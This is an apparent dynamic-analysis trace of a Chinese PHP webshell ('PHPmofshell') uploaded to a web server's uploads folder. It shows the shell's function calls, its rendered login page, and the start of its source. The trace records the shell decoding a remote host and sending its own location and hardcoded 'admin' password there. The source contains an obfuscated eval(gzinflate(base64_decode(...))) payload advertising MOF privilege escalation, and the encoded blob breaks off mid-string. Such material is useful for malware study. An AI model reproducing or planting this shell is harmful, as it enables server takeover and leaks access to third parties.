unpack(\'vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset\', $binary_data);\r\n\r\n    if ($header[\'filename_len\'] != 0)\r\n      $header[\'filename\'] = fread($zip,$header[\'filename_len\']);\r\n    else $header[\'filename\'] = \'\';\r\n\r\n    if ($header[\'extra_len\'] != 0)\r\n      $header[\'extra\'] = fread($zip, $header[\'extra_len\']);\r\n    else $header[\'extra\'] = \'\';\r\n\r\n    if ($header[\'comment_len\'] != 0)\r\n      $header[\'comment\'] = fread($zip, $header[\'comment_len\']);\r\n    else $header[\'comment\'] = \'\';\r\n\r\n    if ($header[\'mdate\'] && $header[\'mtime\'])\r\n    {\r\n      $hour = ($header[\'mtime\'] & 0xF800) >> 11;\r\n      $minute = ($header[\'mtime\'] & 0x07E0) >> 5;\r\n      $seconde = ($header[\'mtime\'] & 0x001F)*2;\r\n      $year = (($header[\'mdate\'] & 0xFE00) >> 9) + 1980;\r\n      $month = ($header[\'mdate\'] & 0x01E0) >> 5;\r\n      $day = $header[\'mdate\'] & 0x001F;\r\n      $header[\'mtime\'] = mktime($hour, $minute, $seconde, $month, $day, $year);\r\n    } else {\r\n      $header[\'mtime\'] = time();\r\n    }\r\n    $header[\'stored_filename\'] = $header[\'filename\'];\r\n    $header[\'status\'] = \'ok\';\r\n    if (substr($header[\'filename\'], -1) == \'/\')\r\n      $header[\'external\'] = 0x41FF0010;\r\n    return $header;\r\n }\r\n\r\n function ReadCentralDir($zip,$zip_name){\r\n\t$size = filesize($zip_name);\r\n\r\n\tif ($size < 277) $maximum_size = $size;\r\n\telse $maximum_size=277;\r\n\t\r\n\t@fseek($zip, $size-$maximum_size);\r\n\t$pos = ftell($zip); $bytes = 0x00000000;\r\n\t\r\n\twhile ($pos < $size){\r\n\t\t$byte = @fread($zip, 1); $bytes=($bytes << 8) | ord($byte);\r\n\t\tif ($bytes == 0x504b0506 or $bytes == 0x2e706870504b0506){ $pos++;break;} $pos++;\r\n\t}\r\n\t\r\n\t$fdata=fread($zip,18);\r\n\t\r\n\t$data=@unpack(\'vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size\',$fdata);\r\n\t\r\n\tif ($data[\'comment_size\'] != 0) $centd[\'comment\'] = fread($zip, $data[\'comment_size\']);\r\n\telse $centd[\'comment\'] = \'\'; $centd[\'entries\'] = $data[\'entries\'];\r\n\t$centd[\'disk_entries\'] = $data[\'disk_entries\'];\r\n\t$centd[\'offset\'] = $data[\'offset\'];$centd[\'disk_start\'] = $data[\'disk_start\'];\r\n\t$centd[\'size\'] = $data[\'size\'];  $centd[\'disk\'] = $data[\'disk\'];\r\n\treturn $centd;\r\n  }\r\n\r\n function ExtractFile($header,$to,$zip){\r\n\t$header = $this->readfileheader($zip);\r\n\t\r\n\tif(substr($to,-1)!="/") $to.="/";\r\n\tif($to==\'./\') $to = \'\';\t\r\n\t$pth = explode("/",$to.$header[\'filename\']);\r\n\t$mydir = \'\';\r\n\tfor($i=0;$i<count($pth)-1;$i++){\r\n\t\tif(!$pth[$i]) continue;\r\n\t\t$mydir .= $pth[$i]."/";\r\n\t\tif((!is_dir($mydir) && @mkdir($mydir,0777)) || (($mydir==$to.$header[\'filename\'] || ($mydir==$to && $this->total_folders==0)) && is_dir($mydir)) ){\r\n\t\t\t@chmod($mydir,0777);\r\n\t\t\t$this->total_folders ++;\r\n\t\t\techo "Ŀ¼: $mydir<br>";\r\n\t\t}\r\n\t}\r\n\t\r\n\tif(strrchr($header[\'filename\'],\'/\')==\'/\') return;\t\r\n\r\n\tif (!($header[\'external\']==0x41FF0010)&&!($header[\'external\']==16)){\r\n\t\tif ($header[\'compression\']==0){\r\n\t\t\t$fp = @fopen($to.$header[\'filename\'], \'wb\');\r\n\t\t\tif(!$fp) return(-1);\r\n\t\t\t$size = $header[\'compressed_size\'];\r\n\t\t\r\n\t\t\twhile ($size != 0){\r\n\t\t\t\t$read_size = ($size < 2048 ? $size : 2048);\r\n\t\t\t\t$buffer = fread($zip, $read_size);\r\n\t\t\t\t$binary_data = pack(\'a\'.$read_size, $buffer);\r\n\t\t\t\t@fwrite($fp, $binary_data, $read_size);\r\n\t\t\t\t$size -= $read_size;\r\n\t\t\t}\r\n\t\t\tfclose($fp);\r\n\t\t\ttouch($to.$header[\'filename\'], $header[\'mtime\']);\r\n\t\t}else{\r\n\t\t\t$fp = @fopen($to.$header[\'filename\'].\'.gz\',\'wb\');\r\n\t\t\tif(!$fp) return(-1);\r\n\t\t\t$binary_data = pack(\'va1a1Va1a1\', 0x8b1f, Chr($header[\'compression\']),\r\n\t\t\tChr(0x00), time(), Chr(0x00), Chr(3));\r\n\t\t\t\r\n\t\t\tfwrite($fp, $binary_data, 10);\r\n\t\t\t$size = $header[\'compressed_size\'];\r\n\t\t\r\n\t\t\twhile ($size != 0){\r\n\t\t\t\t$read_size = ($size < 1024 ? $size : 1024);\r\n\t\t\t\t$buffer = fread($zip, $read_size);\r\n\t\t\t\t$binary_data = pack(\'a\'.$read_size, $buffer);\r\n\t\t\t\t@fwrite($fp, $binary_data, $read_size);\r\n\t\t\t\t$size -= $read_size;\r\n\t\t\t}\r\n\t\t\r\n\t\t\t$binary_data = pack(\'VV\', $header[\'crc\'], $header[\'size\']);\r\n\t\t\tfwrite($fp, $binary_data,8); fclose($fp);\r\n\t\r\n\t\t\t$gzp = @gzopen($to.$header[\'filename\'].\'.gz\',\'rb\') or die("Cette archive est compress");\r\n\t\t\tif(!$gzp) return(-2);\r\n\t\t\t$fp = @fopen($to.$header[\'filename\'],\'wb\');\r\n\t\t\tif(!$fp) return(-1);\r\n\t\t\t$size = $header[\'size\'];\r\n\t\t\r\n\t\t\twhile ($size != 0){\r\n\t\t\t\t$read_size = ($size < 2048 ? $size : 2048);\r\n\t\t\t\t$buffer = gzread($gzp, $read_size);\r\n\t\t\t\t$binary_data = pack(\'a\'.$read_size, $buffer);\r\n\t\t\t\t@fwrite($fp, $binary_data, $read_size);\r\n\t\t\t\t$size -= $read_size;\r\n\t\t\t}\r\n\t\t\tfclose($fp); gzclose($gzp);\r\n\t\t\r\n\t\t\ttouch($to.$header[\'filename\'], $header[\'mtime\']);\r\n\t\t\t@unlink($to.$header[\'filename\'].\'.gz\');\r\n\t\t\t\r\n\t\t}\r\n\t}\r\n\t\r\n\t$this->total_files ++;\r\n\techo "�ļ�: $to$header[filename]<br>";\r\n\treturn true;\r\n }\r\n}\r\nob_end_flush();'	/var/www/html/uploads/PHP大马-php_mof+SHELL.php	8	0
3	10	0	0.015210	1612880	ob_start	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	1	0
3	10	1	0.015248	1629392
3	10	R			TRUE
3	11	0	0.015267	1629392	base64_decode	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	2	1	'aHR0cDovLzQ1Njc3Nzg5LmNvbS8/aG09'
3	11	1	0.015288	1629488
3	11	R			'http://45677789.com/?hm='
3	12	0	0.015306	1629456	base64_decode	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	2	1	'aHR0cDovLw=='
3	12	1	0.015323	1629528
3	12	R			'http://'
3	13	0	0.015340	1629552	urlencode	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	2	1	'http://localhost/uploads/PHP大马-php_mof+SHELL.php||admin'
3	13	1	0.015359	1629696
3	13	R			'http%3A%2F%2Flocalhost%2Fuploads%2FPHP%E5%A4%A7%E9%A9%AC-php_mof%2BSHELL.php%7C%7Cadmin'
3	14	0	0.015378	1629552	file_get_contents	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	2	1	'http://45677789.com/?hm=http%3A%2F%2Flocalhost%2Fuploads%2FPHP%E5%A4%A7%E9%A9%AC-php_mof%2BSHELL.php%7C%7Cadmin&bz=php'
3	14	1	0.693880	1632040
3	14	R			FALSE
3	15	0	0.693995	1631840	define	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	3	2	'myaddress'	'/var/www/html/uploads/PHP大马-php_mof+SHELL.php'
3	15	1	0.694043	1631944
3	15	R			TRUE
3	16	0	0.694056	1631872	define	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	4	2	'myaddress'	'/var/www/html/uploads/PHP大马-php_mof+SHELL.php'
3	16	1	0.694073	1631944
3	16	R			FALSE
3	17	0	0.694086	1631872	define	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	5	2	'envlpass'	'admin'
3	17	1	0.694101	1631976
3	17	R			TRUE
3	18	0	0.694113	1631904	define	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	6	2	'shellname'	'caidaome.com'
3	18	1	0.694128	1632008
3	18	R			TRUE
3	19	0	0.694140	1631936	define	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	7	2	'myurl'	'http://www.caidaome.com'
3	19	1	0.694155	1632040
3	19	R			TRUE
3	20	0	0.694167	1631968	get_magic_quotes_gpc	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	9	0
3	20	1	0.694182	1631968
3	20	R			FALSE
3	21	0	0.694196	1631968	md5	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	16	1	'admin'
3	21	1	0.694211	1632064
3	21	R			'21232f297a57a5a743894a0e4a801fc3'
3	22	0	0.694228	1631968	islogin	1		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	28	2	'caidaome.com'	'http://www.caidaome.com'
4	23	0	0.694245	1631968	gethostbyname	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	2818	1	'localhost'
4	23	1	0.694292	1632048
4	23	R			'127.0.0.1'
3		A						/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	2818	$Server_IP = '127.0.0.1'
3		A						/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	2819	$Server_OS = 'Linux'
3		A						/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	2820	$Server_Soft = 'Apache/2.4.52 (Ubuntu)'
4	24	0	0.694352	1632008	php_uname	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	2821	0
4	24	1	0.694367	1632120
4	24	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
3		A						/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	2821	$web_server = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4	25	0	0.694405	1632120	preg_replace	0		/var/www/html/uploads/PHP大马-php_mof+SHELL.php(8) : eval()'d code	2846	3	'/[_]/e'	NULL	'__'
4	25	1	0.694455	1632216
4	25	R			NULL
3	22	1	0.694470	1631968
			0.694533	1535936
TRACE END   [2023-02-12 22:47:17.795283]

Generated HTML code
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>127.0.0.1-PHPmofshell By:caidaome.com</title>
<style type="text/css">
body{background-color:#000;}
input,select,textarea{font-size: 12px;background-color:#dddddd;border:1px solid #fff}
body,div{font-size: 20px;color:#ddd;}
</style>
</head>
<body scroll="no"><div align="center">
<span style="color: #676767;font-family: Tahoma, Geneva, sans-serif;font-size:12px;">
 <b>Linux______Apache/2.4.52 (Ubuntu)______Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</b>

</span></div>
<div align="center" style="margin-right:70px; margin-bottom:400px;">
<br><br><br><br><form method="post">PASS：<input name="envlpass" type="password" size="20"> <input type="submit" value="登陆"></form><br><br>
</div>
<center>[<font color="red">+</font>] 国产PHP SHELL，支持mof双组建提权,2003环境测试通过<br>[<font color="red">+</font>] 请登陆后使用<br>[<font color="red">+</font>] 请勿用于非法用途，否则后果自负。<br>[<font color="green">+</font>] caidaome_SHELL 2018.01.01<br>
</center>

</body></html>
Original PHP code
<?php
$password='admin';
$shellname='caidaome.com';
$myurl='http://www.caidaome.com';
error_reporting(E_ERROR | E_PARSE);
@set_time_limit(0); header("content-Type: text/html; charset=gb2312"); 

eval(gzinflate(base64_decode("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